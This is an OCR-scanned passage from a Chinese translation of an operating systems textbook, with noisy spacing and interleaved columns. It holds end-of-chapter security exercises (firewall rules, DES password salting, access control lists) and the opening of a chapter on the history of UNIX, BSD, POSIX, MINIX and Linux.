39. 自 解压 缩 文件 ， 把 一 个 或 多 个 文件 以 及 一 个 提 系统 通常 连续 25 次 应 用 DES 算 法 获得 加 密 密 
取 程 序 压缩 在 一 起 ， 通 常用 作 发 布 程序 或 升级 码 。 从 网 上 下 载 一 个 DES 的 实现 ， 写 一 个 程序 
程序 。 请 讨论 这 种 文件 的 安全 特性 。 加 密 一 个 密码 ， 检 查 一 个 密码 对 这 个 系统 是 否 
40. 讨论 用 某 个 程序 做 输入 ， 写 一 个 判断 此 输入 程 有 效 。 使 用 Morris-Thompson 保 护 机 制 产生 一 
序 是 否 含有 病毒 程序 的 可 能 性 。 个 有 10 个 加 密 密 码 的 列表 。 使 用 16 位 盐 。 
41. 9.8.1 节 描述 了 通过 一 系列 防火 墙 规则 将 外 界 访 38. 假设 一 个 系统 使 用 访问 控制 表 维 护 它 的 保护 矩 
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向 限制 在 仅 有 的 三 个 服务 上 。 请 描述 另 一 个 能 
添加 到 此 防火 墙 上 的 规则 集 ， 使 得 对 这 些 服务 
的 访问 受到 进一步 严格 的 限制 。 

.在 某 些 计算 机 上 ， 图 9-37b 使 用 的 SHR 指 令 用 
“0” 来 填充 未 被 使 用 的 位 ， 而 其 他 位 向 右 移 。 
对 图 9-37b 来 说 ， 使 用 不 同 的 移 位 指令 对 正确 
性 是 否 存在 影响 ?如果 有 影响 ， 哪 种 移 位 方法 
307—067 


阵 。 根 据 如 下 情况 写 一 组 管理 函数 管理 访问 控 
制 表 : (1) 创建 一 个 新 的 项 目 ，(2) 删除 一 个 对 
象 ，(3) 创建 一 个 新 域 ，(4) 删除 一 个 域 ，(5) 
新 的 访问 权限 (r、w 和 x 的 某 种 组 合 ) 被 授予 一 
个 域 来 访问 一 个 对 象 ，(6) 撤销 已 存在 的 对 一 
个 域 的 对 象 的 访问 权限 ，(7) 授予 某 个 对 象 对 
所 有 域 的 访问 权限 ，(8) 撤销 某 个 对 象 对 所 有 
域 的 访问 权限 。 


第 10 章 ”实例 研究 1: Linux 


在 前 面 的 章节 中 ， 我 们 大 体 上 学 习 了 很 多 关于 操作 系统 的 原理 、 抽 象 、 算 法 和 技术 。 现 在 分 析 一 些 
具体 的 操作 系统 ， 看 一 看 这 些 原理 在 现实 世界 中 是 怎样 应 用 的 。 我 们 将 从 Linux 开 始 ， 它 是 UNIX 的 一 个 很 
流行 的 衍生 版 本 ， 可 以 运行 在 各 类 计算 机 上 。 它 不 仅 是 高 端 工作 站 和 服务 器 上 的 主流 操作 系统 之 一 ， 还 
在 移动 电话 到 超级 计算 机 的 一 系列 系统 中 得 到 应 用 。Linux 系 统 也 体现 了 很 多 重要 的 操作 系统 设计 原理 。 

我 们 将 从 Linux 的 历史 以 及 UNIX 与 Linux 的 演化 开始 讨论 ， 然 后 给 出 Linux 的 概述 ， 从 而 使 读者 对 它 
的 使 用 有 一 些 概念 。 这 个 概述 对 那些 只 熟悉 Windows 系 统 的 读者 尤为 有 用 ， 因 为 Windows 系 统 实际 上 对 
使 用 者 隐藏 了 几乎 所 有 的 系统 细节 。 虽 然 图 形 界面 可 以 使 初学 者 很 容易 上 手 ， 但 它 提供 了 很 少 的 灵活 性 
而 且 不 能 使 用 户 洞察 到 系统 是 如 何 工作 的 。 

接 下 来 是 本 章 的 核心 内 容 ， 我 们 将 分 析 Linux 的 进程 与 内 存 管理 、L/O、 文 件 系 统 以 及 安全 机 制 。 对 
于 每 个 主题 ， 我 们 将 先 讨论 基本 概念 ， 然 后 是 系统 调用 ， 最 后 讨论 实现 机 制 。 

我 们 首先 应 该 解决 的 问题 是 : 为 什么 要 用 Linux 作 为 例子 ? 的 确 ，Linux 是 UNIX 的 一 个 衍生 版 本 ， 但 
UNIX 自 身 有 很 多 版 本 ， 还 有 很 多 其 他 的 衍生 版 本 ， 包 括 AIX、FreeBSD、HP-UX、SCO UNIX、 System 
VSolaris 等 。 幸 运 的 是 ， 所 有 这 些 系统 的 基本 原理 与 系统 调用 大 体 上 是 相同 的 (在 设计 上 )。 此 外 ， 它 们 
的 总 体 实现 策略 、 算 法 与 数据 结构 也 很 相似 ， 不 过 也 有 一 些 不 同 之 处 。 为 了 使 我 们 的 例子 更 具体 ， 最 好 
选 定 一 个 系统 然后 从 始 至 终 地 对 它 进行 讨论 。 因 为 大 多 数 读者 相对 于 其 他 系统 而 言 更 容易 接触 到 Linux ， 
故我 们 选中 Linux 作 为 例子 。 况 且 除了 实现 相关 的 内 容 ， 本 章 的 大 部 分 内 容 对 所 有 UNIX 系 统 都 是 适用 的 。 
有 很 多 书籍 介绍 怎样 使 用 UNIX， 但 也 有 一 些 介绍 其 高 级 特性 以 及 系统 内 核 (Bovet 和 Cesati，2005， 
Maxwell, 2001, McKusick 和 Neville-Neil, 2004; Pate, 2003, Stevens 和 Rago, 2008; Vahalia, 2007) 


10.1 UNIX 与 Linux 的 历史 


UNIX 与 Linux 有 一 段 漫 长 而 又 有 趣 的 历史 ， 因 此 我 们 将 从 这 里 开始 我 们 的 学 习 。UNIX 开 始 只 是 一 
个 年 轻 的 研究 人 员 (Ken Thompson) 的 业余 项 目 ， 后 来 发 展 成 价值 数 十 亿美 元 的 产业 ， 涉 及 大 学 、 跨 
国 公司 、 政 府 与 国际 标准 化 组 织 。 在 接 下 来 的 内 容 里 我 们 将 展开 这 段 历史 。 

10.1.1 UNICS 

回 到 20 世 纪 40 一 50 年代， 当时 使 用 计算 机 的 标准 方式 是 签约 租用 一 个 小 时 的 机 时 ， 然 后 在 这 个 小 时 
内 独占 整 台 机 器 。 至 少 从 这 个 角度 ， 所 有 的 计算 机 都 是 个 人 计算 机 。 当 然 ， 这 些 机 器 体积 庞大 ， 在 任何 
时 候 只 有 一 个 人 (程序 员 ) 能 使 用 它们 。 当 批 处 理 系统 在 20 世 纪 60 年 代 兴 起 时 ， 程 序 员 把 任务 记录 在 打 
孔 卡 片上 并 提交 到 机 房 。 当 机 房 积累 了 足够 的 任务 后 ， 将 由 操作 员 在 一 次 批 处 理 中 处 理 。 这 样 ， 往 往 在 
提交 任务 一 个 甚至 几 个 小 时 后 才能 得 到 结果 。 在 这 种 情况 下 ， 调 试 成 为 一 个 费时 的 过 程 ， 因 为 一 个 错位 
的 逗号 都 会 导致 程序 员 浪费 数 小 时 。 

为 了 摆脱 这 种 公认 的 令 人 失望 且 没 有 效率 的 设计 安排 ，Dartmouth 学 院 与 M.I.T 发 明了 分 时 系统 。 
Dartmouth 系 统 只 能 运行 BASIC， 并 且 经 历 了 短暂 的 商业 成 功 后 就 消失 了 。M.LT 的 系统 CTSS 用 途 广泛 ， 
在 科学 界 取得 了 巨大 的 成 功 。 不 久之 后 ， 来 自 Bell 实 验 室 与 通用 电器 (随后 成 为 计算 机 的 销售 者 ) 的 研 
究 者 与 MLT 合 作 开始 设计 第 二 代 系统 MULTICS (MULTiplexed Information and Computing Service, $ 
路 复 用 信息 与 计算 服务 )， 我 们 在 第 一 章 讨论 过 它 。 

虽然 Bell 实 验 室 是 MULTICS 项 目的 创始 方 之 一 ， 但 是 它 后 来 撤 出 了 这 个 项 目 ， 仅 留 下 一 位 研究 人 员 
Кеп Thompson 寻 找 一 些 有 意思 的 东西 继续 研究 。 他 最 终 决定 在 一 台 废 弃 的 PDP-7 小 型 机 上 自己 写 一 个 精 
简 版 的 MULTICS (当时 使 用 汇编 语言 )。 尽 管 PDP-7 体 积 很 小 ， 但 是 Thompson 的 系统 实际 上 可 以 工作 并 
且 能 够 支持 他 的 开发 成 果 。 随 后 ，Bell 实 验 室 的 另 一 位 研究 者 Brian Kernighan 有 点 开玩笑 地 把 它 叫 做 
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UNICS (UNiplexed Information and Computing Service， 单 路 信息 与 计算 服务 )。 尽 管 “EUNUCHS” 的 
双关 语 是 对 MULTICS 的 删 碱 ， 但 是 这 个 名 字 保 留 了 下 来 ， 虽 然 其 拼写 后 来 变 成 了 UNIX。 


10.1.2 PDP-11 UNIX 

Thompson 的 工作 给 很 多 他 在 Bell 实 验 室 的 同事 留 下 了 深刻 的 印象 ， 很 快 Dennis Ritchie 加 入 进来 ， 
接着 是 他 所 在 的 整个 部 门 。 在 这 段 时 间 ，UNIX 系 统 有 两 个 重大 的 发 展 。 第 一 ，UNIX 从 过 时 的 PDP-7 计 
算 机 移植 到 更 现代 化 的 PDP-11/20， 然 后 是 PDP-11/45 和 PDP-11/70。 后 两 种 机 器 在 20 世 纪 70 年 代 占据 了 
小 型 计算 机 的 主要 市 场 。PDP-11/45 和 PDP-11/70 的 功能 更 为 强大 ， 有 着 在 当时 较 大 的 物理 内 存 (分 别 为 
256KB 与 2MB)。 同 时 ， 它 们 有 内 存 保护 硬件 ， 从 而 可 以 同时 支持 多 个 用 户 。 然 而 ， 它 们 都 是 16 位 机 器 ， 
从 而 限制 了 单个 进程 只 能 拥有 64KB 的 指令 空间 和 64KB 的 数据 空间 ， 即 使 机 器 能 够 提供 远大 于 此 的 物理 
内 存 。 

第 二 个 发 展 则 与 编写 UNIX 的 编程 语言 有 关 。 直 到 现在 ， 为 每 台新 机 器 重 写 整 个 系统 显然 是 一 件 很 
无 趣 的 事情 ， 因 此 Thompson 决 定 用 自己 设计 的 一 种 高 级 语言 B 重 写 UNIX。B 是 BCPL 的 简化 版 (BCPL 
自己 是 CPL 的 简化 版 ,而 CPL 就 像 PL/I 一 样 从 来 没有 好 用 过 )。 由 于 B 的 种 种 缺陷 ， 尤 其 是 缺乏 数据 结构 ， 
这 次 尝试 并 不 成 功 。 接 着 Ritchie 设 计 了 B 语 言 的 后 继 者 ， 很 自然 地 命名 为 C。Ritchie 同 时 为 编写 了 一 个 
出 色 的 编译 器 。Thompson 和 Ritchie 一 起 工作 , 用 C 重 写 了 UNIX。C 是 恰当 的 时 间 出 现 的 一 种 恰当 的 语言 ， 
从 此 统治 了 操作 系统 编程 。 

1974 年 , Ritchie 和 Thompson 发 表 了 一 篇 关于 UNIX 的 里 程 碑 式 的 论文 (Ritchie 和 Thompson, 1974) 。 
由 于 他 们 在 论文 中 介绍 的 工作 ， 他 们 随后 获得 了 享有 盛誉 的 图 灵 奖 (Ritchie, 1984, Thompson, 1984), 
这 篇 论文 的 发 表 使 许多 大 学 向 Bell 实 验 室 索 要 UNIX 的 复制 。 由 于 Bell 实 验 室 的 母 公司 AT&T 在 当时 作为 
歼 断 企业 受到 监管 ， 不 允许 经 营 计算 机 业务 ， 它 很 愿意 能 够 通过 向 大 学 出 售 UNIX 获 取 适 度 的 费用 。 

-个 偶然 事件 往往 能 够 决定 历史 。PDP-11 正 好 是 几乎 所 有 大 学 的 计算 机 系 选择 的 计算 机 ， 而 PDP- 
11 预 装 的 操作 系统 使 大 量 的 教授 与 学 生 望 而 生 睛 。UNIX 很 快 地 填补 了 这 个 空白 。 这 在 很 大 程度 上 是 因 
为 UNIX 提 供 了 全 部 的 源 代码 ， 人 们 可 以 (实际 上 也 这 么 做 了 ) 不 断 地 进行 修补 。 大 量 科学 会 议 围绕 
UNIX 举 行 ， 在 会 上 杰出 的 演讲 者 们 站 在 台 上 介绍 他 们 在 系统 核心 中 找到 并 改正 的 隐 项 错误 。 一 位 澳 大 
利 亚 教授 John Lions 用 通常 是 为 乔 奥 (Chaucer) 或 莎士比亚 (Shakespeare) 作品 保留 的 格式 为 UNIX 的 
源 代码 编写 了 注释 (1996 年 以 Lions 的 名 义 重新 印刷 ) 。 这 本 书 介绍 了 版 本 6， 之 所 以 这 么 命名 是 因为 它 
出 现在 UNIX 程 序 员 手册 的 第 6 版 中 。 源 代码 包含 8200 行 C 代 码 以 及 900 行 汇编 代码 。 由 于 以 上 所 有 这 些 
活动 ， 关 于 UNIX 系 统 的 新 想法 和 改进 迅速 传播 开 来 。 

在 几 年 内 ， 版 本 6 被 版 本 7 代替 ， 后 者 是 UNIX 的 第 一 个 可 移植 版 本 (运行 在 PDP-11 以 及 Interdata 
8/32 上 )， 已 经 有 18 800 行 C 代 码 以 及 2100 行 汇编 代码 。 在 版 本 7 上 培养 了 整整 一 代 的 学 生 ， 这 些 学 生 毕 
业 去 业界 工作 后 促进 了 它 的 传播 。 到 了 20 世 纪 80 年 代 中 期 ， 各 个 版 本 的 UNIX 在 小 型 机 与 工程 工作 站 上 
已 广 为 使 用 。 很 多 公司 甚至 买 下 源 代码 版 权 开发 自己 的 UNIX 版 本 ， 其 中 有 一 家 年 轻 小 公司 叫做 
Microsoft (微软 ) ， 它 以 XENIX 的 名 义 出 售 版 本 7 好 几 年 了 ， 直 到 它 的 兴趣 转移 到 了 其 他 方向 上 。 


10.1.3 可 移植 的 UNIX 

既然 UNIX 是 用 C 编 写 的 ， 将 它 移动 或 者 移植 (正式 说 法 ) 到 一 台新 机 器 上 比 早先 的 时 候 要 容易 多 
了 。 移 植 首先 需要 为 新 机 器 写 一 个 C 编 译 器 ， 然 后 需要 为 新 机 器 的 1O 设 备 ， 如 显示 器 、 打 印 机 、 磁 盘 等 
编写 设备 驱动 。 虽 然 驱 动 的 代码 是 用 C 写 的 ， 但 由 于 没有 两 个 磁盘 按照 同样 的 方式 工作 ， 它 不 能 被 移植 
到 另 一 台 机 器 ， 并 在 那 台 机 器 上 编译 运行 。 最 终 ， 一 小 部 分 依赖 于 机 器 的 代码 ， 如 中 断 处 理 或 内 存 管理 
程序 ， 必 须 重 写 ， 通 常 使 用 汇编 语言 。 

从 PDP-11 向 外 的 第 一 次 移植 是 到 Interdata 8/32 小 型 机 上 。 这 次 实践 显示 出 UNIX 在 设计 时 暗含 了 一 
大 批 关于 系统 运行 机 器 的 假定 ， 例 如 假定 整 型 的 大 小 为 16 位 ， 指 针 的 大 小 也 是 16 位 (暗示 程序 最 大 容量 
为 64KB)， 还 有 机 器 刚好 有 三 个 寄存 器 存放 重要 的 变量 。 这 些 假定 没有 一 个 与 Interdata 机 器 的 情况 相符 ， 
因此 整理 修改 UNIX 需 要 大 量 的 工作 。 

另 一 个 问题 来 自 Ritchie 的 编译 器 。 尽 管 它 速 度 快 ， 能 够 产生 高 质量 的 目标 代码 ， 这 些 代码 只 是 基于 
PDP-11 机 器 。 有 别 于 针对 Interdata 机 器 写 一 个 新 编译 器 的 通常 做 法 ，Bell 实 验 室 的 Steve Johnson 设 计 并 
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实现 了 可 移植 的 C 编 译 器 ， 只 需要 适量 的 修改 工作 就 能 够 为 任何 设计 合理 的 机 器 生成 目标 代码 。 多 年 以 
来 ， 除 了 PDP-11 以 外 几乎 所 有 机 器 的 С 编译 器 都 是 基于 Johnson 的 编译 器 ， 因 此 Johnson 的 工作 极 大 地 促 
进 了 UNIX 在 新 计算 机 上 的 普及 。 

由 于 所 有 的 开发 工作 都 必须 在 惟一 可 用 的 UNIX 机 器 PDP-11 上 进行 ， 这 台 机 器 正好 在 Bell 实 验 室 的 
第 五 情 ， 而 Interdata 在 第 一 层 ， 因 此 最 初 向 Interdata 机 器 的 移植 进度 缓慢 。 生 成 一 个 新 版 本 意味 着 在 五 
楼 编译 ， 然 后 把 一 个 磁带 搬 到 一 楼 去 检查 这 个 版 本 是 否 能 用 。 在 搬 了 几 个 月 的 磁带 后 ， 有 人 提出 : “要 
知道 我 们 是 一 家 电话 公司 ， 为 什么 我 们 不 把 两 台 机 器 用 电线 连接 起 来 ? ”这 样 UNIX 网 络 诞生 了 。 在 移 
植 到 Interdata 之 后 ，UNIX 又 移植 到 VAX 和 其 他 计算 机 上 。 

在 AT&T 于 1984 年 被 美国 政府 拆 分 后 ， 它 获得 了 设立 计算 机 子 公司 的 法 律 许 可 ， 并 很 快 就 这 样 做 了 。 
不 久 ，AT&T 发 布 了 第 一 个 商业 化 的 UNIX 产 品 一 一 System II1。 它 并 没有 被 很 好 地 接受 ， 因 此 在 一 年 之 
后 就 被 一 个 改进 的 版 本 System V 取 代 。 关 于 System IV 发 生 了 什么 是 计算 机 科学 史上 最 大 的 未 解 之 谜 之 
一 。 最 初 的 System V 很 快 就 被 System V 的 第 2 版 ， 第 3 版 ， 接 着 是 第 4 版 取代 ， 每 一 个 新 版 本 都 更 加 庞大 
和 复杂 。 在 这 个 过 程 中 ，UNIX 系 统 背后 的 初始 思想 ， 即 一 个 简单 、 精 致 的 系统 ， 逐 渐 地 消失 了 。 虽 然 
Ritchie 与 Thompson 的 小 组 之 后 开发 了 UNIX 的 第 8、 第 9 与 第 10 版 ， 由 于 AT&T 把 所 有 的 商业 力量 都 投入 
到 推广 System V 中 ， 它 们 并 没有 得 到 广泛 的 传播 。 然 而 ，UNIX 的 第 8、 第 9 与 第 10 版 的 部 分 思想 被 最 终 
包含 在 System V 中 。AT&T 最 后 决定 ， 它 毕竟 是 一 家 电话 公司 而 不 是 一 家 计算 机 公司 ， 因 此 把 UNIX 的 生 
意 在 1993 年 卖 给 了 Novell。Novell 随 后 在 1995 年 把 它 又 卖 给 了 Santa Cruz Operation。 那 时 候 谁 拥有 UNIX 
的 生意 已 经 无 关 紧 要 了 ， 因 为 所 有 主要 的 计算 机 公司 都 已 经 拥有 了 其 许可 证 。 

10.1.4 Berkeley UNIX 

加 州 大 学 伯克利 分 校 (University of California at Berkeley) 是 早期 获得 UNIX 第 6 版 的 众多 大 学 之 
一 。 由 于 获得 了 整个 源 代码 ，Berkeley 可 以 对 系统 进行 充分 的 修改 。 在 ARPA (Advanced Research Project 
Agency，( 美 国 国防 部 ) 高 级 研究 计划 署 ) 的 赞助 下 ，Berkeley 开 发 并 发 布 了 针对 PDP-11 的 UNIX 改 进 版 
本 ， 称 为 1BSD (First Berkeley Software Distribution，Berkeley 软 件 发 行 第 1 版 )。 这 个 版 本 之 后 很 快 有 
另 一 个 版 本 紧 随 ，、 称 作 2BSD， 它 也 是 为 PDP-11 开 发 的 。 

更 重要 的 版 本 是 3BSD， 尤 其 是 其 后 继 者 ， 为 VAX 开 发 的 4BSD。 虽 然 AT&T 发 布 了 一 个 VAX 上 的 
UNIX 版 本 称 为 32V， 这 个 版 本 本 质 上 是 UNIX 第 7 版 ， 但 是 ， 相 比 之 下 ，4BSD 包 含 一 大 批改 进 。 最 重要 
的 改进 是 应 用 了 虚拟 内 存 与 分 页 ， 使 得 程序 能 够 按照 需求 将 其 一 部 分 调和 人 或 调 出 内 存 ， 从 而 使 程序 能 够 
比 物理 内 存 更 大 。 另 一 个 改进 是 允许 文件 名 长 于 14 个 字符 。 文 件 系统 的 实现 方式 也 发 生 了 变化 ， 其 速度 
得 到 了 显著 的 提高 。 信 号 处 理 变 得 更 为 可 靠 。 网 络 的 引入 使 得 其 使 用 的 网 络 协议 TCP/IP 成 为 UNIX 世 界 
的 实际 标准 。 因 为 Internet 由 基于 UNIX 的 服务 器 统治 ，TCP/IP 接 着 也 成 为 了 Internet 的 实际 标准 。 

Berkeley 也 为 UNIX 添 加 了 许多 应 用 程序 ， 包 括 一 个 新 的 编辑 器 (vi) 、 一 个 新 的 shell (сәһ). Pascal 
与 Lisp 的 编译 器 ， 以 及 很 多 其 他 程序 。 所 有 这 些 改进 使 得 Sun Microsystems，DEC 以 及 其 他 计算 机 销售 
商 基于 Berkeley UNIX 开 发 它们 自己 的 UNIX 版 本 ， 而 不 是 基于 AT&T 的 “官方 " 版 本 System V。 因 此 
Berkeley UNIX 在 教学 、 研 究 以 及 国防 领域 的 地 位 得 到 确立 。 如 果 希 望 得 到 更 多 关于 Berkeley UNIX 的 信 
息 ， 请 查阅 参考 文献 (McKusick 等 人 ，1996) 。 


10.1.5 标准 UNIX 

在 20 世 纪 80 年 代 后 期 ， 两 个 不 同 且 一 定 程度 上 不 相 兼 容 的 UNIX 版 本 (4.3BSD 与 System V 第 3 版 ) 
得 到 广泛 使 用 。 另 外 ， 几 乎 每 个 销售 商都 会 增加 自己 的 非 标准 增强 特性 。UNIX 世 界 的 这 种 分 裂 ， 加 上 
二 进 制程 序 格式 没有 标准 的 事实 ， 使 得 任何 软件 销售 商 编写 和 打包 的 UNIX 程 序 都 不 可 能 在 其 他 UNIX 系 
{т (正如 MS-DOS 所 做 的 一 样 ) ， 从 而 极 大 地 阻碍 了 UNIX 的 商业 成 功 。 各 种 各 样 标准 化 UNIX 的 
党 试 一 开始 都 失败 了 。 一 个 典型 的 例子 是 AT&T 发 布 的 SYVID (System У Interface Definition, System 5 
界面 定义 ) ， 它 定义 了 所 有 的 系统 调用 、 文 件 格式 等 。 这 个 标准 尝试 使 所 有 System V 的 销售 商 保持 一 致 
然而 它 在 敌对 阵营 (BSD) 中 直接 被 忽略 ， 没 有 任何 效果 。 

第 一 次 使 UNIX 的 两 种 流派 一 致 的 严肃 尝试 来 源 于 IEEE ( 它 是 一 个 得 到 高 度 尊重 的 中 立 组 织 ) 标准 
委员 会 的 赞助 。 有 上 百名 来 自 业 界 、 学 界 以 及 政府 的 人 员 参 加 了 此 项 工作 。 他 们 共同 决定 将 这 个 项 目 命 
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名 为 POSIX。 前 三 个 字母 代表 可 移植 操作 系统 (Portable Operating System)， 后 级 IX 用 来 使 这 个 名 字 与 
UNIX 的 构 词 相似 。 

经 过 一 次 又 一 次 的 争论 与 辩驳 之 后 ，POSIX 委 员 会 制定 了 一 个 称 为 1003.1 的 标准 。 它 规定 了 每 一 个 
符合 标准 的 UNIX 系 统 必须 提供 的 库 函 数 。 大 多 数 库 函数 会 引发 系统 调用 ， 但 也 有 一 些 可 以 在 系统 内 核 之 
外 实现 。 典 型 的 库 函 数 包括 open，read 与 fork。POSIX 的 思想 是 这 样 的 ， 一 个 软件 销售 
了 符合 1003.1 标 准 函数 的 程序 ， 那 么 他 就 可 以 确信 这 个 程序 可 以 在 任何 符合 标准 的 UNIX j 

的 确 大 多 数 标准 制定 机 构 都 会 做 出 令 人 厌恶 的 妥协 ， 在 标准 中 包含 一 些 制定 这 个 标准 的 机 构 偏好 的 
一 些 特性 。 在 这 点 上 ， 考 虑 到 制定 时 牵涉 到 的 大 量 相关 者 与 他 们 各 自 既 定 的 喜好 ，1003.1 做 得 非常 好 。 
IEEE 委 员 会 并 没有 采用 System V 与 BSD 特 性 的 并 集 作为 标准 的 起 始点 (大 部 分 的 标准 组 织 常 这 样 做 ) ， 
而 是 采用 了 两 者 的 交集 。 非 常 粗略 地 说 ， 如 果 一 个 特性 在 System V 与 BSD 中 都 出 现 了 ， 它 就 被 包含 在 标 
准 中 ， 否 则 就 被 排除 出 去 。 由 于 这 种 做 法 ，1003.1 与 System V 和 BSD 两 者 的 共同 祖先 UNIX 第 7 版 有 着 很 
强 的 相似 性 。1003.1 文 档 的 编写 方式 使 得 操作 系统 的 开发 者 与 软件 的 开发 者 都 能 够 理解 ， 这 是 它 在 标准 
界 中 的 另 一 个 创新 之 处 ， 即 使 这 方面 的 改进 工作 已 经 在 进行 之 中 。 

虽然 1003.1 标 准 只 解决 了 系统 调用 的 问题 ， 但 是 一 些 相关 文档 对 线程 、 应 用 程序 、 网 络 及 UNIX 的 
其 他 特性 进行 了 标准 化 。 另 外 ，ANSI 与 ISO 组 织 也 对 C 语 言 进行 了 标准 化 。 


10.1.6 MINIX 

所 有 现代 的 UNIX 系 统 共有 的 一 个 特点 是 它们 又 大 又 复杂 。 在 这 点 上 ， 与 UNIX 的 初 囊 背道而驰 。 即 
使 源 代码 可 以 免费 得 到 (在 大 多 数 情况 下 并 不 是 这 样 )， 单 纯 一 个 人 不 再 能 够 理解 整个 系统 。 这 种 情况 
导致 本 书 的 作者 编写 了 一 个 新 的 类 UNIX 系 统 ， 它 足够 小 ， 因 而 比较 容易 理解 。 它 的 所 有 源 代码 公开 ， 
可 以 用 作 教学 目的 。 这 个 系统 由 11 800 行 C 代 码 以 及 800 行 汇编 代码 构成 。 它 于 1987 年 发 布 ， 在 功能 上 与 
UNIX 第 7 版 几乎 相同 ， 后 者 是 PDP-11 时 代 大 多 数 计算 机 科学 系 的 中 流 研 柱 。 

MINIX 属 于 最 早 的 一 批 基于 微 内 核 设计 的 类 UNIX 系 统 。 微 内 核 背 后 的 思想 是 在 内 核 中 只 提供 最 少 
的 功能 ， 从 而 使 其 可 靠 和 高 效 。 因 此 ， 内 存 管理 和 文件 系统 被 作为 用 户 进程 实现 。 内 核 只 负责 进程 间 的 
信息 传递 。 内 核 包 含 1600 行 C 代码 以 及 800 行 汇编 代码 。 由 于 与 8088 体 系 结构 相关 的 技术 原因 ，IO 设 备 
驱动 (增加 2900 行 C 代码 ) 也 在 内 核 中 。 文 件 系统 (5100 行 C 代 码 ) 与 内 存 管理 (2200 行 C 代 码 ) 作为 
两 个 独立 的 用 户 进程 运行 。 

由 于 高 度 模块 化 的 结构 ， 微 内 核 相对 于 单 核 系 统 有 着 易于 理解 和 维护 的 优点 。 同 时 ， 由 于 一 个 用 户 
态 进程 崩溃 后 造成 的 损害 要 远 小 于 一 个 内 核 组 件 崩溃 后 造成 的 损害 ， 因 此 将 功能 代码 从 内 核 移 到 用 户 态 
后 ， 系 统 会 更 加 可 靠 。 微 内 核 的 主要 缺点 是 用 户 态 与 内 核 态 的 额外 切换 会 带 来 较 大 的 性 能 损失 。 然 而 ， 
性 能 并 不 代表 一 切 ， 所 有 现代 的 UNIX 系 统 为 获得 更 好 的 模块 性 在 用 户 态 运行 X-windows， 同 时 容忍 其 
带 来 的 性 能 损失 《与 此 相反 的 是 Windows， 其 中 整个 GUI 运行 在 内 核 中 )。 在 那个 时 代 ， 其 他 的 著名 微 内 
核 设计 包括 Mach (Accetta 等 人 ，1986) 和 Chorus (Rozier 等 人 ，1988) ч 

在 问世 几 个 月 之 内 ，MINIX 在 自己 的 USENET (现在 的 Google) 新 闻 组 comp.os.minix 以 及 超过 
40 000 名 使 用 者 中 风靡 一 时 。 很 多 使 用 者 提供 了 命令 和 其 他 用 户 程序 ，MINIX 从 而 变 成 了 一 个 由 互联 网 
上 的 众多 使 用 者 完成 的 集体 项 目 。 它 是 之 后 出 现 的 其 他 集体 项 目的 一 个 原型 。1997 年 ，MINIX 第 2 版 发 
布 ， 其 基本 系统 包含 了 网 络 ， 并 且 代码 量 增长 到 了 62 200 行 。 

2004 年 左右 ，MINIX 发 展 方向 发 生 了 巨大 的 变化 ， 它 聚焦 到 发 展 一 个 极其 可 靠 、 可 依赖 的 系统 ， 能 
够 自动 修复 自身 错误 并 且 自 恢复 ， 即 使 在 可 重复 软件 缺陷 被 触发 的 情况 下 也 能 够 继续 正常 工作 。 因 此 ， 
第 1 版 中 的 模块 化 思想 在 MINIX 3.0 中 得 到 极 大 扩展 ， 几 乎 所 有 的 设备 驱动 被 移 到 了 用 户 空间 ， 每 一 个 驱 
动作 为 独立 的 进程 运行 。 整 个 核心 的 大 小 突然 降 到 不 到 4000 行 代码 ， 因 此 一 个 单独 的 程序 员 可 以 轻易 地 
理解 。 为 了 增强 容错 能 力 ， 系 统 的 内 部 机 制 在 很 多 地 方 发 生 了 改变 。 

另外 ， 超 过 500 种 流行 的 UNIX 程 序 被 移植 到 MINIX 3.0， 包 括 X Window 系 统 (有 时 候 只 用 X 代 表 )、 
各 种 各 样 的 编译 器 (包括 gcc)、 文 本 处 理 软件 、 网 络 软 件 、 浏 览 器 以 及 其 他 很 多 程序 。 与 以 前 的 版 本 在 
本 质 上 主要 是 教学 用 途 不 同 ， 从 MINIX 3.0 开 始 拥有 高 可 用 性 ， 并 聚焦 在 高 可 靠 性 上 。MINIX 的 最 终 目 
标 是 : 取消 复位 键 。 
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本 书 的 第 三 版 中 介绍 了 这 个 新 系统 ， 在 附录 中 还 有 源 代码 和 详细 介绍 (Tanenbaum #1 Woodhull, 
2006)。MINIX 继 续 发 展 ， 并 有 着 一 个 活跃 的 用 户 群 体 。 如 果 需 要 更 多 细节 或 免费 获取 最 新 版 本 ， 请 访 


间 wwwminix3 отв, 


10.1.7 Linux 

在 互联 网 上 关于 MINIX 的 讨论 和 发 展 的 早期 ， 很 多 人 请 求 (在 很 多 情况 下 是 要 求 ) 添加 更 多 更 好 的 
特性 。 对 于 这 些 请 求 作 者 通常 说 “不 ”( 为 使 系统 足够 小 ， 使 学 生 在 一 个 学 期 的 大 学 课程 中 就 能 完全 理 
解 )。 持 续 的 拒绝 使 很 多 使 用 者 感到 厌倦 。 但 当时 还 没有 FreeBSD， 因 此 这 些 用 户 没 有 其 他 选择 。 这 样 
的 情况 过 了 很 多 年 ， 直 到 一 位 芬兰 学 生 Linus Torvalds 决 定编 写 另 外 一 个 类 UNIX 系 统 ， 称 为 Linux 。 
Linux 将 会 是 一 个 完备 的 系统 产品 ， 拥 有 许多 MINIX 一 开始 缺乏 的 特性 。Linux 的 第 1 个 版 本 0.01 在 1991 
年 发 布 。 它 在 一 台 运 行 MINIX 的 机 器 上 交叉 开发 ， 从 MINIX 借 用 了 从 源码 树 结构 到 文件 系统 设计 的 很 多 
思想 。 然 而 它 是 一 种 整体 式 设计 ， 将 整个 操作 系统 包含 在 内 核 之 中 ， 而 非 MINIX 那 样 的 微 内 核 设计 。 
Linux0.01 版 本 共有 9300 行 C 代 码 和 950 行 汇编 代码 ， 大 致 上 与 MINIX 版 本 大 小 接近 ， 功 能 也 差不多 。 事 
实 上 ，Linux 就 是 Torvalds 对 MINIX 的 一 次 重 写 ， 当 时 ， 他 也 只 能 得 到 MINIX 系 统 的 源 代码 了 。 

当 加 入 了 虚拟 内 存 、 一 个 更 加 复杂 的 文件 系统 以 及 更 多 的 特征 之 后 ，Linux 的 大 小 急速 增长 ， 并 且 
演化 成 了 一 个 完整 的 UNIX 克 隆 产 品 。 虽 然 ， 在 刚 开 始 ，Linux 只 能 运行 在 386 机 器 上 (甚至 把 386 汇 编 代 
码 嵌 入 到 了 C 程 序 中 间 ) ， 但 是 很 快 就 被 移植 到 了 其 他 平台 上 ， 并 且 现 在 像 UNIX 一 样 ， 能 够 运行 在 各 种 
